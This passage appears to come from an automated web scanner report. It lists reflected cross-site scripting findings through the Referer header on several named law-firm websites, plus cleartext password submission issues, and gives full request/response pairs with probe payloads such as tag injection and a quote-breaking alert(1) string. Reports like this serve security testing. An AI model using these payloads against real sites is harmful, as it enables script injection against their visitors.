Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Industries</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270">
...[SNIP]...

2.248. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non-
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

2.249. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Multimedia</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404">
...[SNIP]...

2.250. http://www.arnoldporter.com/news.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /news.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368">
...[SNIP]...

2.251. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /offices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /offices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Offices</title>
       <meta name="Description" content=
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6">
...[SNIP]...

2.252. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Practice Areas &amp; Industries</title>
       <meta nam
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3">
...[SNIP]...

2.253. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /press_releases.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd">
...[SNIP]...

2.254. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /professionals.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /professionals.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Find an Attorney or Professional</title>
       <meta na
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09">
...[SNIP]...

2.255. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /publications.cfm?id=2795&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e">
...[SNIP]...

2.256. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /remote_access.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /remote_access.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: OFFICE=;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f">
...[SNIP]...

2.257. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /search.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Search Form</title>
       <meta name="Description" cont
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4">
...[SNIP]...

2.258. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /sitemap.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sitemap.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882">
...[SNIP]...

2.259. http://www.fulbright.com/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f">
...[SNIP]...

3. Cleartext submission of password

There are 6 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.fulbright.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

3.2. http://www.fulbright.com/index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
